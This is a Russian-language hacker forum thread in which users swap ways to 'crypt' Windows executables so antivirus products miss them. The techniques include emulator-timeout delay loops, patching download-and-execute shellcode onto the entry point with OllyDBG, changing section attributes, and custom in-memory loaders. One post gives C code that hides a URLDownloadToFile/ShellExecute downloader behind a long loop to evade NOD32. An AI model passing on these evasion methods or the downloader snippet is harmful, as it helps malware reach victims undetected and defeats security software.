CannabiS
Цитата:Если знать Ольгу или Hex
Так Ольгу или Hex? Что легче? Что лучше? Я тоже хочу :|

OllyDBG конечно

Цитата:Если знать Ольгу или Hex то в полне реально и ручками моно криптовать

Ну впервую очередь нужно знать ассемблер я полагаю
Да это классно, но пока выучишь ассемблер уу %)

=)
Да чего там знать? Не надо знать все ассемблерные инструкции, на деле нужно порядка пары десятков инструкций ну и хороший справочник по оным, чтоб нырять при встрече малознакомой.
Ну а насчет крипта при помощи хекс редактора и Ольги, так теперь с этим сложнее, ибо дописывание в стаб бинарника или расширение/дописывание последней секции - это уже не модно, эвристик сцуко верещит очень часто на такие вые*оны, поэтому актуальнее свой лоадер/маппер бинарников в память ;) Тут главное эмуляцию на##нуть...

[-SMith-:] Без матов :\

Цитата: Тут главное эмуляцию на##нуть...
Сказал старый Сильвер, сплюнул и затянулся беломором :))

На##нуть каким образом? зациклить ее?

G100M
Цитата (G100M, 22 Nov 08 17:45):На##нуть каким образом? зациклить ее?

Ну, можно зациклить, чтоб эвристик отрубился по таймауту. Я, к примеру, недавно переклепывал под фасм ETG(генератор мусора от Z0mbie), ну и перекомпилил экзампл именно самого генератора(в нем по факту вредоносного кода нет, лишь тулза), после проверил касперским(кис 7.0.0.125), так он бинарник в 4кб весом 12 секунд сканировал(по его счетчику), вредного ничего не нашел, но искал долго, там ветвлений много и псевдогенератор случайных чисел, вследствие чего понятно,что эвристики сейчас быстрые, а таймаут у них не маленький ;)
Лучше конечно найти путь, который эвристик не может пройти, сталобыть спотыкается, например в силу ограниченности окружения =)
Как-то попалась малварка, в ней использовался один метод старенький, я его для тестинга выдрал. Короче смысл такой, я собрал чистый бинарник и вставил в секцию кода(прямо на EntryPoint) шеллкод, который грузит из инторнета фаел и запускает. Кис 7.0.0.125 раскручивает его и грит, мол неизвестная малвара, сталобыть не сигнатурно задетектировал, и не эвристиком(в импортах нет опасны функций, бинарник вполне "добродушный"), а именно эмулятором. В общем запустил я этот шеллкод после использования выцепленного из малвары метода, и киса заткнулся. Сейчас в аттаче будет пример.

-SMith-
Извините, выражение устоявшееся, как-то не обратил внимания, в общем ненарочно.

Цитата (G100M, 22 Nov 08 17:45):Сказал старый Сильвер, сплюнул и затянулся беломором )

В это время какаду с его плеча горланил: "Пиастры!!! Пиастры!!!"

вот небольшой примерчик как это можно сделать в olly, этот способ спасает от слабеньких антивирей, а таких 70-80 % , сначала надо убедиться что атрибут участка кода writable если нет то поменять, идем к нулям вставляем код выполняем этот код в ольге, сохраняем полученный екзешник и меняем точку входа на наш код...
но против популярных антивирей у которых есть продвинутый эмулятор такое не пройдет. Так они сначала ждут расшифровки кода в памяти а уже потом сработают на известную сигнатуру...тут нужно применять разные хитрости...
так эмуляторы еще не знают всех инструкций проца , гдето приводился список таких в статье криса ксперски

вот такая еще есть идейка - против нода

URLDownloadToFile(NULL,"http://ya.ru/logo.png","C:\\11.png",0,0);
ShellExecute(0,"open","C:\\11.png",0,0,SW_SHOW); }

банально но срабатывает
long i,j ;
for (i=0;i<1000000000;i++) {j++;}
if (j > (10000000000-2)) {
URLDownloadToFile(NULL,"http://ya.ru/logo.png","C:\\11.png",0,0);
ShellExecute(0,"open","C:\\11.png",0,0,SW_SHOW); }

karabas-barabas
Ну да, эт и есть зацикливание.

А вообще, проставлять аттрибуты записи на секцию кода - это алерт, на такие фишки многие эвристики реагируют. На крайний случай проставлять эти аттрибуты прямо в памяти при помощи VirtualProtect, а если уж совсем честно, то в секции, не имеющие аттрибуты на запись, их лучше не проставлять и писать туда ничего не желательно. Если вы пишете прот под свой софт, то софт надо сделать с релоками и чтоб он не использовал ресурсов, тогда моно очень просто выделить память в любом(доступном) регионе виртуальной памяти и промапить свой софт туда, и не придется мудрить со сменой базы в PEB и прочей фигней.

А можно ссылку на статью касперски, вышеупомянутую?

вот эта статья здесь
но только что проверил prefetch [eax] уже не актуально, только эмуль Normana не смог справиться , а так все остальные легко.
Получается еще одну статейку видел, не эту там очень много команд приводилось...если вспомню выложу ссылку

кстати закливанием можно чистить без проблем стабы джойнеров, я бы не сказал, что антивирусы начинают при этом визжать просто возможно добавляют +1 raiting но это не всегда мешает...

SilverT
Палицо как доунлодер и неипёт.....